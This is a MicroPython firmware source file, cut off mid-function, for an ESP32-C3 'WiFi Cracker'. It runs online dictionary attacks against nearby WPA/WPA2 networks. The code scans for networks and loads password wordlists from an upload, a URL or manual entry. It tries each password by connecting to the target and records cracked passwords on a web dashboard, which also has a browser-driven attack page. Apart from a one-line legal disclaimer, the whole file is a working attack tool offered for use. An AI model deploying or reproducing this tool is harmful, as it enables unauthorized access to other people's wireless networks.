# main.py - ESP32-C3 Super Mini WiFi Cracker v4.0 - Professional Edition
# Optimized for Long-term Stability, Memory Efficiency, and Advanced Features
import network
import socket
import time
import gc
import os
import random
import select
import ubinascii
from machine import Pin, freq, reset, unique_id, WDT

# ==================== Configuration ====================
AP_SSID = "SuperMini_Hacker"
AP_PASS = "12345678"
CRACK_FILE = "cracked.txt"
WORDLIST_FILE = "wordlist.txt"
PROGRESS_FILE = "progress.txt"
BOOT_PIN = 9  # ESP32-C3 Super Mini Boot Button
LED_PIN = 8   # Adjust if needed

# Performance Settings
FREQ_ACTIVE = 160000000  # 160MHz during cracking
FREQ_IDLE = 80000000     # 80MHz during idle (cooler)
WDT_TIMEOUT = 60000      # 60 second watchdog
MAX_LOG_LINES = 50       # Prevent memory bloat

# ==================== Global State ====================
sta_if = network.WLAN(network.STA_IF)
ap_if = network.WLAN(network.AP_IF)
boot_time = time.time()
led_pin = Pin(LED_PIN, Pin.OUT)
boot_btn = Pin(BOOT_PIN, Pin.IN, Pin.PULL_UP)

# Watchdog Timer
try:
    wdt = WDT(timeout=WDT_TIMEOUT)
    wdt_enabled = True
except:
    wdt_enabled = False
    print("WDT not available")

# Scan Results
wifi_scan_list = []

# Cracking State (Non-blocking)
crack_state = {
    'active': False,
    'ssid': '',
    'current_pwd': '',
    'index': 0,
    'total': 0,
    'logs': [],
    'found': False,
    'found_pwd': '',
    'phase': 0,
    'start_t': 0,
    'wordlist_source': 'file',  # 'file' or 'stream'
    'stream_data': []
}

# Button State for Double Click
btn_last_press = 0
btn_press_count = 0
btn_debounce = 0
btn_last_state = 1  # 1 = not pressed (pull-up)

# WiFi Connection State
wifi_connected = False
wifi_ssid = ""
wifi_password = ""

# Performance tracking
last_gc = time.time()
last_wdt_feed = time.time()
last_freq_check = time.time()

# ==================== Utility Functions ====================
def pad_zero(n):
    return f"{n:02d}"

def calc_uptime():
    s = int(time.time() - boot_time)
    d = s // 86400
    h = (s % 86400) // 3600
    m = (s % 3600) // 60
    sec = s % 60
    if d > 0:
        return f"{d}d {pad_zero(h)}:{pad_zero(m)}:{pad_zero(sec)}"
    return f"{pad_zero(h)}:{pad_zero(m)}:{pad_zero(sec)}"

def calc_memory():
    gc.collect()
    fr = gc.mem_free()
    al = gc.mem_alloc()
    tt = fr + al
    if tt == 0: tt = 1
    pc = int((al * 100) // tt)
    return pc, al // 1024, tt // 1024

def calc_signal(rssi):
    if rssi >= -50: return "█████", "Excellent"
    elif rssi >= -60: return "████░", "Good"
    elif rssi >= -70: return "███░░", "Fair"
    elif rssi >= -80: return "██░░░", "Weak"
    return "█░░░░", "Bad"

def calc_auth(auth):
    modes = {0: "Open", 1: "WEP", 2: "WPA", 3: "WPA2", 4: "WPA/WPA2", 5: "WPA2/WPA3"}
    return modes.get(auth, "?")

def url_decode_str(s):
    result = ""
    i = 0
    while i < len(s):
        if s[i] == '%' and i + 2 < len(s):
            try:
                result += chr(int(s[i+1:i+3], 16))
                i += 3
            except:
                result += s[i]
                i += 1
        elif s[i] == '+':
            result += ' '
            i += 1
        else:
            result += s[i]
            i += 1
    return result

def parse_qs(qs):
    params = {}
    if qs:
        pairs = qs.split('&')
        for pair in pairs:
            if '=' in pair:
                idx = pair.find('=')
                k = pair[:idx]
                v = pair[idx+1:]
                params[url_decode_str(k)] = url_decode_str(v)
    return params

def do_blink(n, fast=False):
    delay = 0.05 if fast else 0.15
    for _ in range(n):
        led_pin.value(0)
        time.sleep(delay)
        led_pin.value(1)
        time.sleep(delay)

def get_dev_id():
    return ubinascii.hexlify(unique_id()).decode()

def estimate_temp():
    # Rough temperature estimation based on uptime and activity
    # This is NOT accurate, just for monitoring
    base = 25
    uptime_factor = min(int(time.time() - boot_time) // 3600, 10)
    activity_factor = 5 if crack_state['active'] else 0
    freq_factor = 5 if freq() > 100000000 else 0
    return base + uptime_factor + activity_factor + freq_factor

# ==================== File System ====================
def f_write(name, content):
    try:
        with open(name, 'w') as f:
            f.write(content)
        return True
    except:
        return False

def f_read(name):
    try:
        with open(name, 'r') as f:
            return f.read()
    except:
        return ""

def f_append(name, content):
    try:
        with open(name, 'a') as f:
            f.write(content + "\n")
        return True
    except:
        return False

def f_delete(name):
    try:
        os.remove(name)
        return True
    except:
        return False

def f_exists(name):
    try:
        os.stat(name)
        return True
    except:
        return False

def f_list():
    try:
        result = []
        for f in os.listdir():
            try:
                sz = os.stat(f)[6]
                result.append({'name': f, 'size': sz})
            except:
                result.append({'name': f, 'size': 0})
        return result
    except:
        return []

# ==================== Wordlist Management ====================
def wl_get():
    c = f_read(WORDLIST_FILE)
    if c:
        return [line.strip() for line in c.split('\n') if line.strip()]
    return []

def wl_set(passwords):
    return f_write(WORDLIST_FILE, '\n'.join(passwords))

def wl_add_list(new_list):
    existing = set(wl_get())
    for p in new_list:
        p = p.strip()
        if p and len(p) >= 8:  # WPA2 minimum
            existing.add(p)
    return wl_set(list(existing))

def wl_count():
    try:
        with open(WORDLIST_FILE, 'r') as f:
            return sum(1 for line in f if line.strip())
    except:
        return 0

# ==================== Crack Data Management ====================
def crack_add(ssid, pwd):
    return f_append(CRACK_FILE, f"{ssid}|{pwd}")

def crack_get():
    c = f_read(CRACK_FILE)
    results = []
    if c:
        for line in c.split('\n'):
            if '|' in line:
                parts = line.split('|')
                if len(parts) >= 2:
                    results.append({'ssid': parts[0], 'password': parts[1]})
    return results

def save_progress():
    if crack_state['active']:
        data = f"{crack_state['ssid']}|{crack_state['index']}|{crack_state['total']}"
        f_write(PROGRESS_FILE, data)

def load_progress():
    data = f_read(PROGRESS_FILE)
    if data and '|' in data:
        parts = data.split('|')
        if len(parts) >= 3:
            return parts[0], int(parts[1]), int(parts[2])
    return None, 0, 0

def clear_progress():
    f_delete(PROGRESS_FILE)

# ==================== CPU Frequency Management ====================
def set_freq_active():
    try:
        freq(FREQ_ACTIVE)
    except:
        pass

def set_freq_idle():
    try:
        freq(FREQ_IDLE)
    except:
        pass

# ==================== Cracking Engine ====================
def start_crack_job(ssid, source='file', stream_data=None):
    global crack_state
    
    # Set to active frequency
    set_freq_active()
    
    crack_state['active'] = True
    crack_state['ssid'] = ssid
    crack_state['index'] = 0
    crack_state['logs'] = [f"🎯 Target: {ssid}"]
    crack_state['found'] = False
    crack_state['found_pwd'] = ""
    crack_state['phase'] = 0
    crack_state['wordlist_source'] = source
    
    if source == 'stream' and stream_data:
        crack_state['stream_data'] = stream_data
        crack_state['total'] = len(stream_data)
    else:
        crack_state['total'] = wl_count()
    
    crack_state['logs'].append(f"📊 Passwords: {crack_state['total']}")
    
    sta_if.active(True)
    sta_if.disconnect()
    
    # Trim logs
    if len(crack_state['logs']) > MAX_LOG_LINES:
        crack_state['logs'] = crack_state['logs'][-MAX_LOG_LINES:]

def get_next_password():
    """Get next password from wordlist file or stream"""
    if crack_state['wordlist_source'] == 'stream':
        if crack_state['index'] < len(crack_state['stream_data']):
            return crack_state['stream_data'][crack_state['index']]
        return None
    else:
        # Read from file line by line (memory efficient)
        try:
            with open(WORDLIST_FILE, 'r') as f:
                for i, line in enumerate(f):
                    if i == crack_state['index']:
                        pwd = line.strip()
                        if len(pwd) >= 8:
                            return pwd
                        else:
                            crack_state['index'] += 1
                            return get_next_password()
        except:
            pass
        return None

def process_crack_job():
    global crack_state
    
    if not crack_state['active']:
        return
    
    # Check if finished
    if crack_state['index'] >= crack_state['total'] or crack_state['found']:
        crack_state['active'] = False
        if crack_state['found']:
            crack_state['logs'].append(f"✅ SUCCESS: {crack_state['found_pwd']}")
            do_blink(10, fast=True)
        else:
            crack_state['logs'].append("❌ Not found")
        
        sta_if.disconnect()
        clear_progress()
        set_freq_idle()  # Back to idle frequency
        
        # Trim logs
        if len(crack_state['logs']) > MAX_LOG_LINES:
            crack_state['logs'] = crack_state['logs'][-MAX_LOG_LINES:]
        return
    
    # State Machine
    if crack_state['phase'] == 0:  # Get password and connect
        pwd = get_next_password()
        
        if pwd is None:
            crack_state['index'] += 1
            return
        
        crack_state['current_pwd'] = pwd
        
        try:
            sta_if.disconnect()
            sta_if.connect(crack_state['ssid'], pwd)
            crack_state['start_t'] = time.time()
            crack_state['phase'] = 1
        except Exception as e:
            crack_state['logs'].append(f"⚠️ Error: {str(e)[:30]}")
            crack_state['index'] += 1
            crack_state['phase'] = 0
        
    elif crack_state['phase'] == 1:  # Wait for connection
        if sta_if.isconnected():
            # SUCCESS!
            crack_state['found'] = True
            crack_state['found_pwd'] = crack_state['current_pwd']
            crack_add(crack_state['ssid'], crack_state['current_pwd'])
            crack_state['active'] = False
            
        elif time.time() - crack_state['start_t'] > 4.0:  # 4 second timeout
            # Failed, try next
            crack_state['logs'].append(f"❌ {crack_state['index']+1}/{crack_state['total']}: {crack_state['current_pwd'][:20]}")
            sta_if.disconnect()
            crack_state['phase'] = 2
            crack_state['start_t'] = time.time()
            
            # Trim logs periodically
            if len(crack_state['logs']) > MAX_LOG_LINES:
                crack_state['logs'] = crack_state['logs'][-MAX_LOG_LINES:]
    
    elif crack_state['phase'] == 2:  # Cooldown
        if time.time() - crack_state['start_t'] > 0.3:
            crack_state['index'] += 1
            crack_state['phase'] = 0
            
            # Save progress every 10 passwords
            if crack_state['index'] % 10 == 0:
                save_progress()
                gc.collect()

# ==================== CSS Styling ====================
CSS = """<style>
:root{--p:#00f2ff;--s:#0f0f1a;--t:#1a1a2e;--b:rgba(0,242,255,0.1);--g:#00e676;--r:#ff3d00}
*{margin:0;padding:0;box-sizing:border-box;font-family:'Segoe UI',Tahoma,sans-serif}
body{background:linear-gradient(135deg,#000,#0a0a12);color:#fff;min-height:100vh;direction:rtl}
a{text-decoration:none;color:inherit}
.c{max-width:900px;margin:0 auto;padding:15px}
.card{background:rgba(255,255,255,0.03);border:1px solid rgba(255,255,255,0.1);border-radius:16px;padding:20px;margin-bottom:15px;backdrop-filter:blur(10px);box-shadow:0 4px 30px rgba(0,0,0,0.5)}
.h{display:flex;justify-content:space-between;align-items:center;margin-bottom:20px;border-bottom:1px solid rgba(255,255,255,0.1);padding-bottom:10px}
.h h1{font-size:20px;color:var(--p);text-shadow:0 0 10px rgba(0,242,255,0.5)}
.stats{display:grid;grid-template-columns:repeat(auto-fit,minmax(80px,1fr));gap:10px}
.stat{background:var(--b);padding:10px;border-radius:10px;text-align:center;border:1px solid rgba(0,242,255,0.2)}
.stat .v{font-size:16px;font-weight:bold;color:#fff}
.stat .l{font-size:10px;color:var(--p);margin-top:2px}
.grid{display:grid;grid-template-columns:repeat(2,1fr);gap:10px;margin:15px 0}
.btn{display:block;padding:12px;background:var(--t);border:1px solid var(--p);border-radius:12px;text-align:center;transition:0.2s;cursor:pointer}
.btn:active{transform:scale(0.98);background:var(--b)}
.btn i{font-size:24px;display:block;margin-bottom:5px}
.btn s{font-size:12px;text-decoration:none;font-weight:bold}
.list-item{display:flex;justify-content:space-between;align-items:center;background:rgba(255,255,255,0.05);padding:12px;border-radius:10px;margin-bottom:8px}
input,textarea{width:100%;background:rgba(0,0,0,0.5);border:1px solid #333;color:#fff;padding:10px;border-radius:8px;margin-bottom:10px;outline:none}
input:focus,textarea:focus{border-color:var(--p)}
.act-btn{padding:8px 12px;border-radius:6px;font-size:11px;margin-right:5px;cursor:pointer;border:none;font-weight:bold}
.b-g{background:var(--g);color:#000}.b-r{background:var(--r);color:#fff}.b-p{background:var(--p);color:#000}
.log-box{max-height:300px;overflow-y:auto;background:#000;padding:10px;border-radius:8px;font-family:monospace;font-size:11px;border:1px solid #333;line-height:1.6}
.progress{height:6px;background:#333;border-radius:3px;overflow:hidden;margin:10px 0}
.bar{height:100%;background:linear-gradient(90deg,var(--p),var(--g));transition:0.3s}
.alert{padding:10px;border-radius:8px;margin:10px 0;font-size:12px}
.alert-info{background:rgba(0,242,255,0.1);border:1px solid var(--p)}
.alert-success{background:rgba(0,230,118,0.1);border:1px solid var(--g)}
.alert-danger{background:rgba(255,61,0,0.1);border:1px solid var(--r)}
</style>"""

# ==================== HTML Generators ====================
def html_dashboard():
    mp, mu, mt = calc_memory()
    temp = estimate_temp()
    ap_status = "🟢 ON" if ap_if.active() else "🔴 OFF"
    
    # WiFi connection status
    wifi_status = "🔴 Offline"
    if sta_if.isconnected():
        wifi_status = f"🟢 {sta_if.ifconfig()[0]}"
    
    return f"""<!DOCTYPE html><html><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0">
<meta http-equiv="refresh" content="10"><title>SuperMini Hacker</title>{CSS}</head><body>
<div class="c"><div class="card h"><h1>☠️ {AP_SSID}</h1><span>v4.0 Pro</span></div>
<div class="card"><div class="stats">
<div class="stat"><div class="v">{calc_uptime()}</div><div class="l">UPTIME</div></div>
<div class="stat"><div class="v">{mp}%</div><div class="l">RAM</div></div>
<div class="stat"><div class="v">{len(crack_get())}</div><div class="l">CRACKED</div></div>
<div class="stat"><div class="v">{freq()//1000000}M</div><div class="l">CPU</div></div>
<div class="stat"><div class="v">~{temp}°C</div><div class="l">TEMP</div></div>
<div class="stat"><div class="v">{ap_status}</div><div class="l">HOTSPOT</div></div>
</div></div>
<div class="card">
<div style="font-size:11px;margin-bottom:10px">🌐 Internet: {wifi_status}</div>
<div class="grid">
<a href="/connect" class="btn"><i>🔗</i><s>Connect WiFi</s></a>
<a href="/wifi" class="btn"><i>📶</i><s>WiFi Scanner</s></a>
<a href="/webcrack" class="btn"><i>⚡</i><s>Web Crack</s></a>
<a href="/wordlist" class="btn"><i>📝</i><s>Wordlist</s></a>
<a href="/results" class="btn"><i>🏆</i><s>Results</s></a>
<a href="/tools" class="btn"><i>🛠️</i><s>Tools</s></a>
</div></div>
<div class="card"><div style="font-size:10px;opacity:0.6;text-align:center">
RAM: {mu}KB / {mt}KB | ID: {get_dev_id()[:8]} | WDT: {'ON' if wdt_enabled else 'OFF'}
</div></div>
</div></body></html>"""

def html_wifi_page():
    networks_html = ""
    for w in wifi_scan_list:
        ssid = w[0].decode() if isinstance(w[0], bytes) else str(w[0])
        rssi = w[3]
        auth = calc_auth(w[4])
        signal_bar, signal_text = calc_signal(rssi)
        
        networks_html += f"""<div class="list-item">
<div><b>{ssid}</b><br><small>{signal_bar} {rssi}dBm | {auth}</small></div>
<div><a href="/wifi/crack?ssid={ssid}" class="act-btn b-r">CRACK</a></div>
</div>"""
    
    if not networks_html:
        networks_html = '<div class="alert alert-info">No networks found. Click SCAN to start.</div>'
    
    return f"""<!DOCTYPE html><html><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>WiFi Scanner</title>{CSS}</head><body><div class="c">
<div class="card h"><h1>📶 WiFi Scanner</h1><a href="/" class="act-btn b-p">Home</a></div>
<div class="card" style="display:flex;gap:10px">
<a href="/wifi/scan" class="act-btn b-g" style="flex:1;text-align:center;padding:12px">🔍 SCAN NETWORKS</a>
<a href="/wifi/disconnect" class="act-btn b-r" style="text-align:center;padding:12px">❌ DISCONNECT</a>
</div>
<div class="card">{networks_html}</div>
</div></body></html>"""

def html_webcrack_page():
    return f"""<!DOCTYPE html><html><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>Web Crack</title>{CSS}<script>
let stop=false;
async function startAttack(){{
    let ssid=document.getElementById('ssid').value;
    let file=document.getElementById('file').files[0];
    if(!ssid||!file){{alert('لطفاً SSID و فایل را انتخاب کنید');return;}}
    stop=false;
    document.getElementById('startBtn').disabled=true;
    let reader=new FileReader();
    reader.onload=async function(e){{
        let lines=e.target.result.split('\\n');
        let log=document.getElementById('log');
        let total=lines.length;
        let tested=0;
        log.innerHTML='<div style="color:var(--p)">🚀 Starting attack...</div>';
        
        for(let i=0;i<lines.length;i++){{
            if(stop)break;
            let pwd=lines[i].trim();
            if(pwd.length<8)continue;
            tested++;
            
            let pct=Math.floor((tested/total)*100);
            log.innerHTML=`<div>📊 Progress: ${{tested}}/${{total}} (${{pct}}%)</div>
<div style="color:#aaa">🔑 Testing: <b>${{pwd.substring(0,30)}}</b></div>`;
            
            try{{
                let res=await fetch(`/api/try?ssid=${{encodeURIComponent(ssid)}}&pwd=${{encodeURIComponent(pwd)}}`);
                let json=await res.json();
                if(json.result==='ok'){{
                    log.innerHTML+=`<div style="color:var(--g);margin-top:10px">✅ <b>FOUND PASSWORD: ${{pwd}}</b></div>`;
                    alert('✅ Password Found: '+pwd);
                    stop=true;
                    document.getElementById('startBtn').disabled=false;
                    return;
                }}
            }}catch(e){{console.log(e);}}
            await new Promise(r=>setTimeout(r,100));
        }}
        if(!stop){{
            log.innerHTML+=`<div style="color:var(--r);margin-top:10px">❌ Password not found in list</div>`;
        }}
        document.getElementById('startBtn').disabled=false;
    }};
    reader.readAsText(file);
}}
function stopAttack(){{stop=true;document.getElementById('startBtn').disabled=false;}}
</script></head><body><div class="c">
<div class="card h"><h1>⚡ Web-Based Cracker</h1><a href="/" class="act-btn b-p">Home</a></div>
<div class="card">
<div class="alert alert-info">
<b>💡 نحوه استفاده:</b><br>
1. فایل پسورد لیست را انتخاب کنید (هر سایزی)<br>
2. SSID هدف را وارد کنید<br>
3. حمله را شروع کنید - پردازش در مرورگر شما انجام می‌شود
</div>
<input type="text" id="ssid" placeholder="Target SSID (مثال: MyWiFi)">
<input type="file" id="file" accept=".txt">
<button id="startBtn" onclick="startAttack()" class="btn" style="background:var(--g);color:#000;margin-bottom:5px">🚀 START ATTACK</button>
<button onclick="stopAttack()" class="btn" style="background:var(--r)">⛔ STOP</button>
</div>
<div class="card log-box" id="log">Ready to attack...</div>
</div></body></html>"""

def html_connect_page():
    networks_html = ""
    for w in wifi_scan_list:
        ssid = w[0].decode() if isinstance(w[0], bytes) else str(w[0])
        rssi = w[3]
        auth = calc_auth(w[4])
        signal_bar, signal_text = calc_signal(rssi)
        
        networks_html += f"""<div class="list-item">
<div><b>{ssid}</b><br><small>{signal_bar} {rssi}dBm | {auth}</small></div>
<div><a href="/connect/to?ssid={ssid}" class="act-btn b-g">CONNECT</a></div>
</div>"""
    
    if not networks_html:
        networks_html = '<div class="alert alert-info">Click SCAN to find networks</div>'
    
    wifi_status = "Disconnected"
    if sta_if.isconnected():
        wifi_status = f"Connected: {sta_if.ifconfig()[0]}"
    
    return f"""<!DOCTYPE html><html><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>WiFi Connect</title>{CSS}</head><body><div class="c">
<div class="card h"><h1>🔗 Connect to WiFi</h1><a href="/" class="act-btn b-p">Home</a></div>
<div class="card">
<div style="margin-bottom:10px">Status: <b>{wifi_status}</b></div>
<div style="display:flex;gap:10px">
<a href="/connect/scan" class="act-btn b-g" style="flex:1;text-align:center;padding:12px">🔍 SCAN</a>
<a href="/connect/disconnect" class="act-btn b-r" style="text-align:center;padding:12px">❌ DISCONNECT</a>
</div>
</div>
<div class="card">{networks_html}</div>
</div></body></html>"""

def html_connect_form(ssid):
    return f"""<!DOCTYPE html><html><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>Enter Password</title>{CSS}</head><body><div class="c">
<div class="card h"><h1>🔑 Enter Password</h1><a href="/connect" class="act-btn b-p">Back</a></div>
<div class="card">
<h3>Network: {ssid}</h3>
<form action="/connect/do" method="POST">
<input type="hidden" name="ssid" value="{ssid}">
<input type="password" name="password" placeholder="WiFi Password" required autofocus>
<button type="submit" class="btn" style="background:var(--g);color:#000">CONNECT</button>
</form>
</div>
</div></body></html>"""

def html_wordlist_page():
    count = wl_count()
    internet_status = "🟢 Connected" if sta_if.isconnected() else "🔴 Offline"
    
    return f"""<!DOCTYPE html><html><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>Wordlist Manager</title>{CSS}</head><body><div class="c">
<div class="card h"><h1>📝 Wordlist Manager</h1><a href="/" class="act-btn b-p">Home</a></div>
<div class="card">
<div class="stats">
<div class="stat"><div class="v">{count}</div><div class="l">PASSWORDS</div></div>
</div>
</div>
<div class="card">
<h3 style="margin-bottom:10px">📤 Upload Wordlist</h3>
<form action="/wordlist/upload" method="POST" enctype="multipart/form-data">
<input type="file" name="file" accept=".txt" required>
<button type="submit" class="btn" style="background:var(--g);color:#000">UPLOAD FILE</button>
</form>
</div>
<div class="card">
<h3 style="margin-bottom:10px">🌐 Download from URL</h3>
<div class="alert alert-info">Internet: {internet_status}</div>
<form action="/wordlist/url" method="POST">
<input type="text" name="url" placeholder="https://example.com/passwords.txt" required>
<button type="submit" class="btn" style="background:var(--p);color:#000">DOWNLOAD</button>
</form>
</div>
<div class="card">
<h3 style="margin-bottom:10px">✏️ Manual Entry</h3>
<form action="/wordlist/add" method="POST">
<textarea name="passwords" rows="5" placeholder="یک پسورد در هر خط..."></textarea>
<button type="submit" class="btn" style="background:var(--p);color:#000">ADD PASSWORDS</button>
</form>
</div>
<div class="card">
<a href="/wordlist/clear" class="btn" style="background:var(--r)" onclick="return confirm('Delete all passwords?')">🗑️ CLEAR WORDLIST</a>
</div>
</div></body></html>"""

def html_results_page():
    results = crack_get()
    results_html = ""
    
    for r in results:
        results_html += f"""<div class="list-item">
<div><b>{r['ssid']}</b><br><small>🔑 {r['password']}</small></div>
<div><button onclick="navigator.clipboard.writeText('{r['password']}')" class="act-btn b-g">COPY</button></div>
</div>"""
    
    if not results_html:
        results_html = '<div class="alert alert-info">No cracked networks yet.</div>'
    
    return f"""<!DOCTYPE html><html><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>Results</title>{CSS}</head><body><div class="c">
<div class="card h"><h1>🏆 Cracked Networks</h1><a href="/" class="act-btn b-p">Home</a></div>
<div class="card">{results_html}</div>
<div class="card">
<a href="/results/clear" class="btn" style="background:var(--r)" onclick="return confirm('Clear all results?')">🗑️ CLEAR RESULTS</a>
</div>
</div></body></html>"""

def html_crack_status():
    log_txt = '<br>'.join(crack_state['logs'][-30:])
    pct = 0
    if crack_state['total'] > 0:
        pct = int((crack_state['index'] / crack_state['total']) * 100)
    
    refresh = '<meta http-equiv="refresh" content="3">' if crack_state['active'] else ''
    status_text = "🔄 Active" if crack_state['active'] else "✅ Completed"
    
    return f"""<!DOCTYPE html><html><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0">
{refresh}<title>Attack Status</title>{CSS}</head><body><div class="c">
<div class="card h"><h1>⚔️ Attack Status</h1><a href="/wifi" class="act-btn b-p">Back</a></div>
<div class="card">
<h3>🎯 Target: {crack_state['ssid']}</h3>
<p style="font-size:12px;color:#aaa;margin:5px 0">Status: {status_text}</p>
<div class="progress"><div class="bar" style="width:{pct}%"></div></div>
<div style="display:flex;justify-content:space-between;font-size:12px;margin-top:5px">
<span>📊 {crack_state['index']} / {crack_state['total']}</span>
<span>{pct}%</span>
</div>
</div>
<div class="card log-box">{log_txt}</div>
</div></body></html>"""

def html_tools_page():
    return f"""<!DOCTYPE html><html><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>Tools</title>{CSS}</head><body><div class="c">
<div class="card h"><h1>🛠️ System Tools</h1><a href="/" class="act-btn b-p">Home</a></div>
<div class="card">
<h3>System Actions</h3>
<div class="grid">
<a href="/tools/reboot" class="btn" onclick="return confirm('Reboot device?')"><i>🔄</i><s>Reboot</s></a>
<a href="/tools/gc" class="btn"><i>🧹</i><s>Clean RAM</s></a>
</div>
</div>
<div class="card">
<h3>Hotspot Control</h3>
<div class="alert alert-info">💡 Double-click BOOT button to toggle hotspot</div>
<div class="grid">
<a href="/tools/ap_on" class="btn" style="background:var(--g);color:#000"><i>🟢</i><s>Enable AP</s></a>
<a href="/tools/ap_off" class="btn" style="background:var(--r)"><i>🔴</i><s>Disable AP</s></a>
</div>
</div>
</div></body></html>"""

def html_about_page():
    mp, mu, mt = calc_memory()
    
    return f"""<!DOCTYPE html><html><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>About</title>{CSS}</head><body><div class="c">
<div class="card h"><h1>ℹ️ About</h1><a href="/" class="act-btn b-p">Home</a></div>
<div class="card">
<h2 style="color:var(--p);margin-bottom:10px">ESP32-C3 WiFi Cracker v4.0</h2>
<p style="line-height:1.8;font-size:13px">
<b>Features:</b><br>
✅ Non-blocking architecture<br>
✅ Web-based password list management<br>
✅ Memory optimized for long-term operation<br>
✅ CPU frequency scaling (80-160MHz)<br>
✅ Watchdog timer protection<br>
✅ Double-click boot button toggle<br>
✅ Progress saving & auto-resume<br>
</p>
</div>
<div class="card">
<h3>System Info</h3>
<div style="font-family:monospace;font-size:11px;line-height:1.8">
Device ID: {get_dev_id()}<br>
CPU Freq: {freq()//1000000} MHz<br>
RAM: {mu}KB / {mt}KB ({mp}%)<br>
Uptime: {calc_uptime()}<br>
Temp: ~{estimate_temp()}°C<br>
Watchdog: {'Enabled' if wdt_enabled else 'Disabled'}<br>
</div>
</div>
<div class="card">
<div class="alert alert-danger">
<b>⚠️ Legal Notice:</b><br>
This tool is for educational and authorized testing only. Unauthorized access to networks is illegal.
</div>
</div>
</div></body></html>"""

# ==================== HTTP Helpers ====================
def send_header(sock, redir=None, content_type="text/html"):
    if redir:
        sock.send(f"HTTP/1.1 303 See Other\r\nLocation: {redir}\r\n\r\n".encode())
    else:
        sock.send(f"HTTP/1.1 200 OK\r\nContent-Type:{content_type};charset=utf-8\r\nConnection: close\r\n\r\n".encode())

def send_chunk(sock, data):
    try:
        sock.send(data.encode())
    except:
        pass

def parse_multipart_file(body, boundary):
    """Simple multipart file parser"""
    try:
        parts = body.split(boundary)
        for part in parts:
            if b'filename=' in part:
                # Extract file content
                content_start = part.find(b'\r\n\r\n')
                if content_start != -1:
                    content = part[content_start+4:].strip()
                    try:
                        return content.decode('utf-8')
                    except:
                        # If decode fails, try latin-1
                        return content.decode('latin-1')
    except:
        pass
    return None

# ==================== Request Handler ====================
def handle_request(cl):
    global wifi_scan_list
    
    try:
        req = cl.recv(4096).decode('utf-8')
        if not req:
            return
        
        # Parse request
        lines = req.split('\r\n')
        if not lines:
            return
        
        line1 = lines[0]
        parts = line1.split(' ')
        if len(parts) < 2:
            return
        
        method, path_full = parts[0], parts[1]
        path = path_full.split('?')[0]
        qs = path_full.split('?')[1] if '?' in path_full else ''
        
        # Parse POST body
        body = {}
        if method == 'POST':
            body_start = req.find('\r\n\r\n')
            if body_start != -1:
                body_content = req[body_start+4:]
                
                # Check if multipart
                if 'multipart/form-data' in req:
                    # Extract boundary
                    for line in lines:
                        if 'boundary=' in line:
                            boundary = line.split('boundary=')[1].strip()
                            try:
                                file_content = parse_multipart_file(body_content.encode(), boundary.encode())
                                if file_content:
                                    body['file_content'] = file_content
                            except:
                                pass
                            break
                else:
                    body = parse_qs(body_content)
        
        qp = parse_qs(qs)
        
        # ==================== ROUTES ====================
        
        # Dashboard
        if path == '/':
            send_header(cl)
            send_chunk(cl, html_dashboard())
        
        # WiFi Scanner
        elif path == '/wifi':
            send_header(cl)
            send_chunk(cl, html_wifi_page())
        
        elif path == '/wifi/scan':
            sta_if.active(True)
            wifi_scan_list = sta_if.scan()
            send_header(cl, '/wifi')
        
        elif path == '/wifi/disconnect':
            sta_if.disconnect()
            send_header(cl, '/wifi')
        
        elif path == '/wifi/crack':
            ssid = qp.get('ssid', '')
            if ssid:
                start_crack_job(ssid, source='file')
                send_header(cl, '/crack_status')
            else:
                send_header(cl, '/wifi')
        
        # Crack Status
        elif path == '/crack_status':
            send_header(cl)
            send_chunk(cl, html_crack_status())
        
        # Web Crack
        elif path == '/webcrack':
            send_header(cl)
            send_chunk(cl, html_webcrack_page())
        
        elif path == '/api/try':
            # Single password test API
            ssid = qp.get('ssid', '')
            pwd = qp.get('pwd', '')
            
            sta_if.active(True)
            sta_if.disconnect()
            
            result = 'no'
            if len(pwd) >= 8:
                try:
                    sta_if.connect(ssid, pwd)
                    ts = time.time()
                    while time.time() - ts < 5:
                        if sta_if.isconnected():
                            result = 'ok'
                            crack_add(ssid, pwd)
                            break
                        time.sleep(0.1)
                    sta_if.disconnect()
                except:
                    pass
            
            send_header(cl, content_type="application/json")
            send_chunk(cl, f'{{"result":"{result}"}}')
        
        # Wordlist Management
        elif path == '/wordlist':
            send_header(cl)
            send_chunk(cl, html_wordlist_page())
        
        elif path == '/wordlist/upload' and method == 'POST':
            if 'file_content' in body:
                passwords = [line.strip() for line in body['file_content'].split('\n') if line.strip()]
                wl_add_list(passwords)
            send_header(cl, '/wordlist')
        
        elif path == '/wordlist/url' and method == 'POST':
            url = body.get('url', '')
            if url and sta_if.isconnected():
                try:
                    import urequests
                    response = urequests.get(url, timeout=30)
                    if response.status_code == 200:
                        content = response.text
                        passwords = [line.strip() for line in content.split('\n') if line.strip()]
                        wl_add_list(passwords)
                    response.close()
                except Exception as e:
                    print(f"Download error: {e}")
            send_header(cl, '/wordlist')
        
        elif path == '/wordlist/add' and method == 'POST':
            passwords_text = body.get('passwords', '')
            if passwords_text:
                passwords = [line.strip() for line in passwords_text.split('\n') if line.strip()]
                wl_add_list(passwords)
            send_header(cl, '/wordlist')
        
        elif path == '/wordlist/clear':
            f_delete(WORDLIST_FILE)
            send_header(cl, '/wordlist')
        
        # Results
        elif path == '/results':
            send_header(cl)
            send_chunk(cl, html_results_page())
        
        elif path == '/results/clear':
            f_delete(CRACK_FILE)
            send_header(cl, '/results')
        
        # Tools
        elif path == '/tools':
            send_header(cl)
            send_chunk(cl, html_tools_page())
        
        elif path == '/tools/reboot':
            send_header(cl)
            send_chunk(cl, '<html><body>Rebooting...</body></html>')
            time.sleep(1)
            reset()
        
        elif path == '/tools/gc':
            gc.collect()
            send_header(cl, '/tools')
        
        elif path == '/tools/ap_on':
            ap_if.active(True)
            do_blink(3)
            send_header(cl, '/tools')
        
        elif path == '/tools/ap_off':
